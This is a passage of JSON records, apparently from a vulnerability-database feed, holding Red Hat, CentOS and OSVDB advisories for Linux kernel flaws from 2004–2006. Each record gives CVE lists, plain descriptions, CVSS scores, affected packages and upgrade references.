"redhat", "title": "(RHSA-2006:0101) kernel security update", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-08-13T18:45:46", "bulletinFamily": "unix", "cvelist": ["CVE-2002-2185", "CVE-2004-1058", "CVE-2004-1073", "CVE-2005-0400", "CVE-2005-0815", "CVE-2005-2458", "CVE-2005-2708", "CVE-2005-2709", "CVE-2005-2973", "CVE-2005-3180", "CVE-2005-3274", "CVE-2005-3275", "CVE-2005-3806"], "description": "The Linux kernel handles the basic functions of the operating system.\r\n\r\nThese new kernel packages contain fixes for the security issues described\r\nbelow:\r\n\r\n- a flaw in network IGMP processing that a allowed a remote user on the\r\nlocal network to cause a denial of service (disabling of multicast reports)\r\nif the system is running multicast applications (CVE-2002-2185, moderate) \r\n\r\n- a race condition that allowed local users to read the environment\r\nvariables of another process (CVE-2004-1058, low)\r\n\r\n- a flaw in the open_exec function of execve that allowed a local user to\r\nread setuid ELF binaries that should otherwise be protected by standard\r\npermissions. (CVE-2004-1073, moderate). Red Hat originally reported this\r\nflaw as being fixed by RHSA-2004:504, but a patch for this issue was\r\nmissing from that update.\r\n\r\n- a potential leak of kernel data from ext2 file system handling\r\n(CVE-2005-0400, low) \r\n\r\n- flaws in ISO-9660 file system handling that allowed the mounting of\r\nan invalid image on a CD-ROM to cause a denial of service (crash)\r\nor potentially execute arbitrary code (CVE-2005-0815, moderate) \r\n\r\n- a flaw in gzip/zlib handling internal to the kernel that may allow a\r\nlocal user to cause a denial of service (crash) (CVE-2005-2458, low) \r\n\r\n- a flaw in exec() handling on some 64-bit architectures that allowed a\r\nlocal user to cause a denial of service (crash) (CVE-2005-2708, important) \r\n\r\n- a flaw in procfs handling during unloading of modules that allowed a\r\nlocal user to cause a denial of service or potentially gain privileges\r\n(CVE-2005-2709, moderate) \r\n\r\n- a flaw in IPv6 network UDP port hash table lookups that allowed a local\r\nuser to cause a denial of service (hang) (CVE-2005-2973, important) \r\n\r\n- a network buffer info leak using the orinoco driver that allowed a remote\r\nuser to possibly view uninitialized data (CVE-2005-3180, important) \r\n\r\n- a race condition affecting SMP systems that allowed a local user to cause\r\na denial of service (crash) (CVE-2005-3274, important)\r\n\r\n- a flaw in IPv4 network TCP and UDP netfilter handling that allowed a\r\nlocal user to cause a denial of service (crash) (CVE-2005-3275, important) \r\n\r\n- a flaw in the IPv6 flowlabel code that allowed a local user to cause a\r\ndenial of service (crash) (CVE-2005-3806, important) \r\n\r\nThe following bugs were also addressed:\r\n\r\n- Handle set_brk() errors in binfmt_elf\r\n\r\n- Correct scsi error return\r\n\r\nAll Red Hat Enterprise Linux 2.1 users are advised to upgrade their kernels\r\nto the packages associated with their machine architectures and\r\nconfigurations as listed in this erratum.", "modified": "2018-03-14T19:25:39", "published": "2006-02-01T05:00:00", "id": "RHSA-2006:0190", "href": "https://access.redhat.com/errata/RHSA-2006:0190", "type": "redhat", "title": "(RHSA-2006:0190) kernel security update", "cvss": {"score": 6.6, "vector": "AV:L/AC:L/Au:N/C:N/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:16", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0619", "CVE-2005-0384", "CVE-2005-0449", "CVE-2005-0750"], "description": "The Linux kernel handles the basic functions of the operating system.\n\nThis is the seventh regular kernel update to Red Hat Enterprise Linux 2.1\n\nThe following security updates were made:\n\nA flaw in fragment queuing was discovered that affected the Linux 2.4 and\nLinux 2.6 kernel netfilter subsystem. On systems configured to filter or\nprocess network packets (for example those configured to do firewalling),\na remote attacker could send a carefully crafted set of fragmented packets\nto a machine and cause a denial of service (system crash). In order to\nsucessfully exploit this flaw, the attacker would need to know (or guess)\nsome aspects of the firewall ruleset in place on the target system to be\nable to craft the right fragmented packets. (CAN-2005-0449)\n\nA flaw was discovered in the Linux PPP driver. On systems allowing remote\nusers to connect to a server using ppp, a remote client could cause a\ndenial of service (system crash). (CAN-2005-0384)\n\nA flaw was discovered in the bluetooth driver system. On system where the\nbluetooth modules are loaded, a local user could use this flaw to gain\nelevated (root) privileges. (CAN-2005-0750)\n\nAn integer overflow flaw was discovered in the ubsec_keysetup function\nin the Broadcom 5820 cryptonet driver. On systems using this driver,\na local user could cause a denial of service (crash) or possibly gain\nelevated privileges. (CAN-2004-0619) Please note that this update contains\nan unpatched kernel module called bcm5820_old for backwards compatibility\nwhich is still vulnerable to CAN-2004-0619. \n\nThe following device drivers have been updated to new versions:\n\n mptfusion: 2.05.16 -> 2.05.16.02\n bcm5820: 1.17 -> 1.81\n cciss: 2.4.52 -> 2.4.54\n qla2x00: 6.04.01 -> 7.01.01\n\nThere were many bug fixes in various parts of the kernel. The ongoing\neffort to resolve these problems has resulted in a marked improvement\nin the reliability and scalability of Red Hat Enterprise Linux 2.1.\n\nBug fixes include:\n - Fixes an incorrect and ever-changing physical_id field in\n /proc/cpuinfo.\n - Now recognizes a particular e1000 device (PCI ID 8086:1014)\n - Fixes a panic in disk quota code\n - Fixes a bug in which msync(...MS_SYNC) returns before the data\n is written to disk\n - Adds new devices to the SCSI scan list so they can\n be initialized and handled properly: LSI ProFibre 4000R, HP\n HSV200/210, HP MSA, STK OPENstorage D178.\n - Fixes a potential format overflow in /proc/partitions\n - Restores module parameters to the e100 driver for compatibility with \n existing customer scripts.\n - Fixes a bug in which cat'ing /proc/mdstat while adding/removing\n devices can cause a kernel oops\n\nAll Red Hat Enterprise Linux 2.1 users are advised to upgrade their\nkernels to the packages associated with their machine architectures\nand configurations as listed in this erratum.\n\nPlease note that a vulnerability addressed by this update (CAN-2005-0449)\nrequired a change to the kernel module ABI which could cause third party\nmodules to not work. However, Red Hat is currently not aware of any module\nthat would be affected by this change.", "modified": "2018-03-14T19:27:15", "published": "2005-04-28T04:00:00", "id": "RHSA-2005:283", "href": "https://access.redhat.com/errata/RHSA-2005:283", "type": "redhat", "title": "(RHSA-2005:283) kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2020-07-17T03:29:05", "bulletinFamily": "unix", "cvelist": ["CVE-2005-3858", "CVE-2005-3275", "CVE-2004-1057", "CVE-2005-3044", "CVE-2005-3806", "CVE-2005-3848", "CVE-2005-2709", "CVE-2005-2973", "CVE-2005-3180", "CVE-2005-2708", "CVE-2005-3857", "CVE-2002-2185"], "description": "**CentOS Errata and Security Advisory** CESA-2006:0140\n\n\nThe Linux kernel handles the basic functions of the operating system.\r\n\r\nThese new kernel packages contain fixes for the security issues\r\ndescribed below:\r\n\r\n- a flaw in network IGMP processing that a allowed a remote user on the\r\nlocal network to cause a denial of service (disabling of multicast reports)\r\nif the system is running multicast applications (CVE-2002-2185, moderate)\r\n\r\n- a flaw in remap_page_range() with O_DIRECT writes that allowed a local\r\nuser to cause a denial of service (crash) (CVE-2004-1057, important)\r\n\r\n- a flaw in exec() handling on some 64-bit architectures that allowed\r\na local user to cause a denial of service (crash) (CVE-2005-2708, important)\r\n\r\n- a flaw in procfs handling during unloading of modules that allowed a\r\nlocal user to cause a denial of service or potentially gain privileges \r\n(CVE-2005-2709, moderate)\r\n\r\n- a flaw in IPv6 network UDP port hash table lookups that allowed a local\r\nuser to cause a denial of service (hang) (CVE-2005-2973, important)\r\n\r\n- a flaw in 32-bit-compat handling of the TIOCGDEV ioctl that allowed\r\na local user to cause a denial of service (crash) (CVE-2005-3044, important)\r\n\r\n- a network buffer info leak using the orinoco driver that allowed\r\na remote user to possibly view uninitialized data (CVE-2005-3180, important)\r\n\r\n- a flaw in IPv4 network TCP and UDP netfilter handling that allowed\r\na local user to cause a denial of service (crash) (CVE-2005-3275, important)\r\n\r\n- a flaw in the IPv6 flowlabel code that allowed a local user to cause a\r\ndenial of service (crash) (CVE-2005-3806, important)\r\n\r\n- a flaw in network ICMP processing that allowed a local user to cause\r\na denial of service (memory exhaustion) (CVE-2005-3848, important)\r\n\r\n- a flaw in file lease time-out handling that allowed a local user to cause\r\na denial of service (log file overflow) (CVE-2005-3857, moderate)\r\n\r\n- a flaw in network IPv6 xfrm handling that allowed a local user to\r\ncause a denial of service (memory exhaustion) (CVE-2005-3858, important)\r\n\r\nAll Red Hat Enterprise Linux 3 users are advised to upgrade their kernels\r\nto the packages associated with their machine architecture and\r\nconfigurations as listed in this erratum.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2006-January/024627.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-January/024628.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-January/024631.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-January/024639.html\n\n**Affected packages:**\nkernel\nkernel-BOOT\nkernel-doc\nkernel-hugemem\nkernel-hugemem-unsupported\nkernel-smp\nkernel-smp-unsupported\nkernel-source\nkernel-unsupported\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2006-0140.html", "edition": 6, "modified": "2006-01-20T17:25:48", "published": "2006-01-19T22:25:06", "href": "http://lists.centos.org/pipermail/centos-announce/2006-January/024627.html", "id": "CESA-2006:0140", "title": "kernel security update", "type": "centos", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-20T18:28:01", "bulletinFamily": "unix", "cvelist": ["CVE-2004-1058", "CVE-2005-0124", "CVE-2005-3275", "CVE-2005-3806", "CVE-2005-2709", "CVE-2005-2973", "CVE-2005-3180", "CVE-2005-0815", "CVE-2005-0400", "CVE-2005-2458", "CVE-2002-2185", "CVE-2004-1073"], "description": "**CentOS Errata and Security Advisory** CESA-2006:0191-01\n\n\nThe Linux kernel handles the basic functions of the operating system. \r\n\r\nThese new kernel packages contain fixes for the security issues described\r\nbelow:\r\n\r\n- a flaw in network IGMP processing that a allowed a remote user on the\r\nlocal network to cause a denial of service (disabling of multicast reports)\r\nif the system is running multicast applications (CVE-2002-2185, moderate) \r\n\r\n- a race condition that allowed local users to read the environment\r\nvariables of another process (CVE-2004-1058, low)\r\n\r\n- a flaw in the open_exec function of execve that allowed a local user to\r\nread setuid ELF binaries that should otherwise be protected by standard\r\npermissions. (CVE-2004-1073, moderate). Red Hat originally reported this\r\nflaw as being fixed by RHSA-2004:504, but a patch for this issue was\r\nmissing from that update.\r\n\r\n- a flaw in the coda module that allowed a local user to cause a denial of\r\nservice (crash) or possibly gain privileges (CVE-2005-0124, moderate)\r\n\r\n- a potential leak of kernel data from ext2 file system handling\r\n(CVE-2005-0400, low) \r\n\r\n- flaws in ISO-9660 file system handling that allowed the mounting of\r\nan invalid image on a CD-ROM to cause a denial of service (crash)\r\nor potentially execute arbitrary code (CVE-2005-0815, moderate) \r\n\r\n- a flaw in gzip/zlib handling internal to the kernel that may allow a\r\nlocal user to cause a denial of service (crash) (CVE-2005-2458, low) \r\n\r\n- a flaw in procfs handling during unloading of modules that allowed a\r\nlocal user to cause a denial of service or potentially gain privileges\r\n(CVE-2005-2709, moderate) \r\n\r\n- a flaw in IPv6 network UDP port hash table lookups that allowed a local\r\nuser to cause a denial of service (hang) (CVE-2005-2973, important) \r\n\r\n- a network buffer info leak using the orinoco driver that allowed a remote\r\nuser to possibly view uninitialized data (CVE-2005-3180, important) \r\n\r\n- a flaw in IPv4 network TCP and UDP netfilter handling that allowed a\r\nlocal user to cause a denial of service (crash) (CVE-2005-3275, important) \r\n\r\n- a flaw in the IPv6 flowlabel code that allowed a local user to cause a\r\ndenial of service (crash) (CVE-2005-3806, important) \r\n\r\nThe following bugs were also addressed: \r\n\r\n- Handle set_brk() errors in binfmt_elf/aout\r\n\r\n- Correct error handling in shmem_ioctl\r\n\r\n- Correct scsi error return\r\n\r\n- Fix netdump time keeping bug\r\n\r\n- Fix netdump link-down freeze\r\n\r\n- Fix FAT fs deadlock\r\n\r\nAll Red Hat Enterprise Linux 2.1 users are advised to upgrade their kernels\r\nto the packages associated with their machine architectures and\r\nconfigurations as listed in this erratum.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2006-February/024658.html\n\n**Affected packages:**\nkernel\nkernel-BOOT\nkernel-debug\nkernel-doc\nkernel-enterprise\nkernel-headers\nkernel-smp\nkernel-source\nkernel-summit\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/rh21as-errata.html", "edition": 5, "modified": "2006-02-02T22:07:50", "published": "2006-02-02T22:07:50", "href": "http://lists.centos.org/pipermail/centos-announce/2006-February/024658.html", "id": "CESA-2006:0191-01", "title": "kernel security update", "type": "centos", "cvss": {"score": 6.6, "vector": "AV:L/AC:L/Au:N/C:N/I:C/A:C"}}, {"lastseen": "2019-12-20T18:25:06", "bulletinFamily": "unix", "cvelist": ["CVE-2005-3784", "CVE-2005-3358", "CVE-2005-3106", "CVE-2005-3858", "CVE-2005-3109", "CVE-2005-3356", "CVE-2005-3044", "CVE-2005-3806", "CVE-2005-3848", "CVE-2005-2800", "CVE-2005-4605", "CVE-2004-1190", "CVE-2005-2709", "CVE-2005-3857", "CVE-2005-2458", "CVE-2002-2185", "CVE-2005-3276"], "description": "**CentOS Errata and Security Advisory** CESA-2006:0101\n\n\nThe Linux kernel handles the basic functions of the operating system.\r\n\r\nThese new kernel packages contain fixes for the security issues\r\ndescribed below:\r\n\r\n- a flaw in network IGMP processing that a allowed a remote user on the\r\nlocal network to cause a denial of service (disabling of multicast reports)\r\nif the system is running multicast applications (CVE-2002-2185, moderate)\r\n\r\n- a flaw which allowed a local user to write to firmware on read-only\r\nopened /dev/cdrom devices (CVE-2004-1190, moderate) \r\n\r\n- a flaw in gzip/zlib handling internal to the kernel that may allow a\r\nlocal user to cause a denial of service (crash) (CVE-2005-2458, low) \r\n\r\n- a flaw in procfs handling during unloading of modules that allowed a\r\nlocal user to cause a denial of service or potentially gain privileges\r\n(CVE-2005-2709, moderate)\r\n\r\n- a flaw in the SCSI procfs interface that allowed a local user to cause a\r\ndenial of service (crash) (CVE-2005-2800, moderate)\r\n\r\n- a flaw in 32-bit-compat handling of the TIOCGDEV ioctl that allowed\r\na local user to cause a denial of service (crash) (CVE-2005-3044, important)\r\n\r\n- a race condition when threads share memory mapping that allowed local\r\nusers to cause a denial of service (deadlock) (CVE-2005-3106, important)\r\n\r\n- a flaw when trying to mount a non-hfsplus filesystem using hfsplus that\r\nallowed local users to cause a denial of service (crash) (CVE-2005-3109,\r\nmoderate)\r\n\r\n- a minor info leak with the get_thread_area() syscall that allowed\r\na local user to view uninitialized kernel stack data (CVE-2005-3276, low) \r\n\r\n- a flaw in mq_open system call that allowed a local user to cause a denial\r\nof service (crash) (CVE-2005-3356, important)\r\n\r\n- a flaw in set_mempolicy that allowed a local user on some 64-bit\r\narchitectures to cause a denial of service (crash) (CVE-2005-3358, important)\r\n\r\n- a flaw in the auto-reap of child processes that allowed a local user to\r\ncause a denial of service (crash) (CVE-2005-3784, important)\r\n\r\n- a flaw in the IPv6 flowlabel code that allowed a local user to cause a\r\ndenial of service (crash) (CVE-2005-3806, important)\r\n\r\n- a flaw in network ICMP processing that allowed a local user to cause\r\na denial of service (memory exhaustion) (CVE-2005-3848, important)\r\n\r\n- a flaw in file lease time-out handling that allowed a local user to cause\r\na denial of service (log file overflow) (CVE-2005-3857, moderate) \r\n\r\n- a flaw in network IPv6 xfrm handling that allowed a local user to\r\ncause a denial of service (memory exhaustion) (CVE-2005-3858, important) \r\n\r\n- a flaw in procfs handling that allowed a local user to read kernel memory\r\n(CVE-2005-4605, important)\r\n\r\nAll Red Hat Enterprise Linux 4 users are advised to upgrade their kernels\r\nto the packages associated with their machine architectures and\r\nconfigurations as listed in this erratum.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2006-January/024618.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-January/024619.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-January/024620.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-January/024621.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-January/024622.html\n\n**Affected packages:**\nkernel\nkernel-devel\nkernel-doc\nkernel-hugemem\nkernel-hugemem-devel\nkernel-smp\nkernel-smp-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2006-0101.html", "edition": 4, "modified": "2006-01-18T18:30:45", "published": "2006-01-18T00:05:51", "href": "http://lists.centos.org/pipermail/centos-announce/2006-January/024618.html", "id": "CESA-2006:0101", "title": "kernel security update", "type": "centos", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-20T18:25:39", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0619", "CVE-2005-0384", "CVE-2005-0449", "CVE-2005-0750"], "description": "**CentOS Errata and Security Advisory** CESA-2005:283-01\n\n\nThe Linux kernel handles the basic functions of the operating system.\n\nThis is the seventh regular kernel update to Red Hat Enterprise Linux 2.1\n\nThe following security updates were made:\n\nA flaw in fragment queuing was discovered that affected the Linux 2.4 and\nLinux 2.6 kernel netfilter subsystem. On systems configured to filter or\nprocess network packets (for example those configured to do firewalling),\na remote attacker could send a carefully crafted set of fragmented packets\nto a machine and cause a denial of service (system crash). In order to\nsucessfully exploit this flaw, the attacker would need to know (or guess)\nsome aspects of the firewall ruleset in place on the target system to be\nable to craft the right fragmented packets. (CAN-2005-0449)\n\nA flaw was discovered in the Linux PPP driver. On systems allowing remote\nusers to connect to a server using ppp, a remote client could cause a\ndenial of service (system crash). (CAN-2005-0384)\n\nA flaw was discovered in the bluetooth driver system. On system where the\nbluetooth modules are loaded, a local user could use this flaw to gain\nelevated (root) privileges. (CAN-2005-0750)\n\nAn integer overflow flaw was discovered in the ubsec_keysetup function\nin the Broadcom 5820 cryptonet driver. On systems using this driver,\na local user could cause a denial of service (crash) or possibly gain\nelevated privileges. (CAN-2004-0619) Please note that this update contains\nan unpatched kernel module called bcm5820_old for backwards compatibility\nwhich is still vulnerable to CAN-2004-0619. \n\nThe following device drivers have been updated to new versions:\n\n mptfusion: 2.05.16 -> 2.05.16.02\n bcm5820: 1.17 -> 1.81\n cciss: 2.4.52 -> 2.4.54\n qla2x00: 6.04.01 -> 7.01.01\n\nThere were many bug fixes in various parts of the kernel. The ongoing\neffort to resolve these problems has resulted in a marked improvement\nin the reliability and scalability of Red Hat Enterprise Linux 2.1.\n\nBug fixes include:\n - Fixes an incorrect and ever-changing physical_id field in\n /proc/cpuinfo.\n - Now recognizes a particular e1000 device (PCI ID 8086:1014)\n - Fixes a panic in disk quota code\n - Fixes a bug in which msync(...MS_SYNC) returns before the data\n is written to disk\n - Adds new devices to the SCSI scan list so they can\n be initialized and handled properly: LSI ProFibre 4000R, HP\n HSV200/210, HP MSA, STK OPENstorage D178.\n - Fixes a potential format overflow in /proc/partitions\n - Restores module parameters to the e100 driver for compatibility with \n existing customer scripts.\n - Fixes a bug in which cat'ing /proc/mdstat while adding/removing\n devices can cause a kernel oops\n\nAll Red Hat Enterprise Linux 2.1 users are advised to upgrade their\nkernels to the packages associated with their machine architectures\nand configurations as listed in this erratum.\n\nPlease note that a vulnerability addressed by this update (CAN-2005-0449)\nrequired a change to the kernel module ABI which could cause third party\nmodules to not work. However, Red Hat is currently not aware of any module\nthat would be affected by this change.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2005-April/023659.html\n\n**Affected packages:**\nkernel\nkernel-BOOT\nkernel-debug\nkernel-doc\nkernel-enterprise\nkernel-headers\nkernel-smp\nkernel-source\nkernel-summit\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/rh21as-errata.html", "edition": 5, "modified": "2005-04-29T05:42:41", "published": "2005-04-29T05:42:41", "href": "http://lists.centos.org/pipermail/centos-announce/2005-April/023659.html", "id": "CESA-2005:283-01", "title": "kernel security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:19", "bulletinFamily": "software", "cvelist": ["CVE-2005-4618"], "edition": 1, "description": "## Solution Description\nUpgrade to version 2.6.15 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## References:\nVendor Specific News/Changelog Entry: http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.15\nVendor Specific News/Changelog Entry: http://www.kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=8febdd85adaa41fa1fc1cb31286210fc2cd3ed0c\n[Vendor Specific Advisory URL](http://www.us.debian.org/security/2006/dsa-1018)\n[Vendor Specific Advisory URL](http://www.ubuntulinux.org/usn/usn-244-1)\n[Vendor Specific Advisory URL](http://www.debian.org/security/2006/dsa-1017)\n[Secunia Advisory ID:18216](https://secuniaresearch.flexerasoftware.com/advisories/18216/)\n[Secunia Advisory ID:19374](https://secuniaresearch.flexerasoftware.com/advisories/19374/)\n[Secunia Advisory ID:18527](https://secuniaresearch.flexerasoftware.com/advisories/18527/)\n[Secunia Advisory ID:19369](https://secuniaresearch.flexerasoftware.com/advisories/19369/)\n[Related OSVDB ID: 22214](https://vulners.com/osvdb/OSVDB:22214)\n[Related OSVDB ID: 22216](https://vulners.com/osvdb/OSVDB:22216)\n[Related OSVDB ID: 22213](https://vulners.com/osvdb/OSVDB:22213)\nFrSIRT Advisory: ADV-2006-0035\n[CVE-2005-4618](https://vulners.com/cve/CVE-2005-4618)\nBugtraq ID: 16141\n", "modified": "2006-01-02T09:33:13", "published": "2006-01-02T09:33:13", "href": "https://vulners.com/osvdb/OSVDB:22215", "id": "OSVDB:22215", "type": "osvdb", "title": "Linux Kernel sysctl.c NULL Byte Off-by-one Memory Corruption DoS", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:18", "bulletinFamily": "software", "cvelist": ["CVE-2005-3783"], "edition": 1, "description": "## Solution Description\nUpgrade to version 2.6.14.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## References:\nVendor Specific News/Changelog Entry: http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.14.2\nVendor Specific News/Changelog Entry: https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=174075\n[Vendor Specific Advisory URL](http://www.us.debian.org/security/2006/dsa-1018)\n[Vendor Specific Advisory URL](http://lists.suse.com/archive/suse-security-announce/2005-Dec/0002.html)\n[Vendor Specific Advisory URL](http://www.ubuntulinux.org/usn/usn-231-1)\n[Vendor Specific Advisory URL](http://www.debian.org/security/2006/dsa-1017)\n[Vendor Specific Advisory URL](ftp://patches.sgi.com/support/free/security/advisories/20060402-01-U.asc)\n[Secunia Advisory ID:17787](https://secuniaresearch.flexerasoftware.com/advisories/17787/)\n[Secunia Advisory ID:17918](https://secuniaresearch.flexerasoftware.com/advisories/17918/)\n[Secunia Advisory ID:19374](https://secuniaresearch.flexerasoftware.com/advisories/19374/)\n[Secunia Advisory ID:17917](https://secuniaresearch.flexerasoftware.com/advisories/17917/)\n[Secunia Advisory ID:18203](https://secuniaresearch.flexerasoftware.com/advisories/18203/)\n[Secunia Advisory ID:19369](https://secuniaresearch.flexerasoftware.com/advisories/19369/)\n[Secunia Advisory ID:17761](https://secuniaresearch.flexerasoftware.com/advisories/17761/)\n[Secunia Advisory ID:19607](https://secuniaresearch.flexerasoftware.com/advisories/19607/)\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2005-Dec/0004.html\nMail List Post: http://www.kernel.org/git/?p=linux/kernel/git/gregkh/linux-2.6.14.y.git;a=commit;h=082d52c56f642d21b771a13221068d40915a1409\n[CVE-2005-3783](https://vulners.com/cve/CVE-2005-3783)\n", "modified": "2005-11-09T09:20:05", "published": "2005-11-09T09:20:05", "href": "https://vulners.com/osvdb/OSVDB:21283", "id": "OSVDB:21283", "title": "Linux Kernel ptrace CLONE_THREAD Local DoS", "type": "osvdb", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-04-28T13:20:08", "bulletinFamily": "software", "cvelist": ["CVE-2004-1058"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nVendor Specific News/Changelog Entry: http://kernel.org/pub/linux/kernel/v2.4/ChangeLog-2.4.33\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2005-120_RHSA-2005-283_RHSA-2005-284_RHSA-2005-293_RHSA-2005-472.pdf)\n[Vendor Specific Advisory URL](http://www.us.debian.org/security/2006/dsa-1018)\n[Vendor Specific Advisory URL](ftp://patches.sgi.com/support/free/security/advisories/20060402-01-U.asc)\n[Secunia Advisory ID:15092](https://secuniaresearch.flexerasoftware.com/advisories/15092/)\n[Secunia Advisory ID:21476](https://secuniaresearch.flexerasoftware.com/advisories/21476/)\n[Secunia Advisory ID:19038](https://secuniaresearch.flexerasoftware.com/advisories/19038/)\n[Secunia Advisory ID:18684](https://secuniaresearch.flexerasoftware.com/advisories/18684/)\n[Secunia Advisory ID:19369](https://secuniaresearch.flexerasoftware.com/advisories/19369/)\n[Secunia Advisory ID:13572](https://secuniaresearch.flexerasoftware.com/advisories/13572/)\n[Secunia Advisory ID:14002](https://secuniaresearch.flexerasoftware.com/advisories/14002/)\n[Secunia Advisory ID:19607](https://secuniaresearch.flexerasoftware.com/advisories/19607/)\nRedHat RHSA: RHSA-2005:293\nRedHat RHSA: RHSA-2006:0190\nOther Advisory URL: http://www.mandrakesoft.com/security/advisories?name=MDKSA-2005:022\nOther Advisory URL: http://lists.suse.de/archive/suse-security-announce/2006-Feb/0010.html\nMail List Post: http://marc.theaimsgroup.com/?l=bugtraq&m=110306397320336&w=2\nISS X-Force ID: 17151\n[CVE-2004-1058](https://vulners.com/cve/CVE-2004-1058)\n", "modified": "2004-11-23T00:00:00", "published": "2004-11-23T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:12562", "id": "OSVDB:12562", "type": "osvdb", "title": "Linux Kernel Spawning Process Environment Variable Disclosure", "cvss": {"score": 1.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:17", "bulletinFamily": "software", "cvelist": ["CVE-2005-2709"], "edition": 1, "description": "## Vulnerability Description\nThe Linux kernel contains a flaw that may allow a local denial of service. The issue is triggered due to an error in sysctl's handling of interface unregistrations, and will result in loss of availability for the service.\n## Solution Description\nUpgrade to version 2.6.14.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nThe Linux kernel contains a flaw that may allow a local denial of service. The issue is triggered due to an error in sysctl's handling of interface unregistrations, and will result in loss of availability for the service.\n## References:\nVendor Specific News/Changelog Entry: http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.14.1\nVendor Specific News/Changelog Entry: http://www.kernel.org/git/?p=linux/kernel/git/gregkh/linux-2.6.14.y.git;a=commit;h=e4e0411221c7d4f2bd82fa5e21745f927a1bff28\n[Vendor Specific Advisory URL](http://www.us.debian.org/security/2006/dsa-1018)\n[Vendor Specific Advisory URL](http://www.ubuntulinux.org/usn/usn-219-1)\n[Vendor Specific Advisory URL](http://www.trustix.org/errata/2006/0051/)\n[Vendor Specific Advisory URL](http://www.debian.org/security/2006/dsa-1017)\nSecurity Tracker: 1015434\n[Secunia Advisory ID:17504](https://secuniaresearch.flexerasoftware.com/advisories/17504/)\n[Secunia Advisory ID:18510](https://secuniaresearch.flexerasoftware.com/advisories/18510/)\n[Secunia Advisory ID:19374](https://secuniaresearch.flexerasoftware.com/advisories/19374/)\n[Secunia Advisory ID:18562](https://secuniaresearch.flexerasoftware.com/advisories/18562/)\n[Secunia Advisory ID:17541](https://secuniaresearch.flexerasoftware.com/advisories/17541/)\n[Secunia Advisory ID:17648](https://secuniaresearch.flexerasoftware.com/advisories/17648/)\n[Secunia Advisory ID:18684](https://secuniaresearch.flexerasoftware.com/advisories/18684/)\n[Secunia Advisory ID:19369](https://secuniaresearch.flexerasoftware.com/advisories/19369/)\n[Secunia Advisory ID:21954](https://secuniaresearch.flexerasoftware.com/advisories/21954/)\nRedHat RHSA: RHSA-2006:0101\nRedHat RHSA: RHSA-2006:0140\nRedHat RHSA: RHSA-2006:0190\n[CVE-2005-2709](https://vulners.com/cve/CVE-2005-2709)\n", "modified": "2005-11-08T08:03:14", "published": "2005-11-08T08:03:14", "href": "https://vulners.com/osvdb/OSVDB:20676", "id": "OSVDB:20676", "type": "osvdb", "title": "Linux Kernel sysctl Interface Unregistration Local DoS", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:06", "bulletinFamily": "software", "cvelist": ["CVE-2004-0887"], "edition": 1, "description": "## Vulnerability Description\nLinux Kernel contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when a malicious user invokes an unspecified privileged instruction that is not properly handled. No further details have been provided.\n## Technical Description\nThis reportedly only affects the SUSE Linux Enterprise Server 9 on the S/390 platform.\n## Solution Description\nUpgrade to version 2.6.8 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nLinux Kernel contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when a malicious user invokes an unspecified privileged instruction that is not properly handled. No further details have been provided.\n## References:\n[Vendor Specific Advisory URL](http://www.us.debian.org/security/2006/dsa-1018)\nSecurity Tracker: 1011853\nSecurity Tracker: 1011855\n[Secunia Advisory 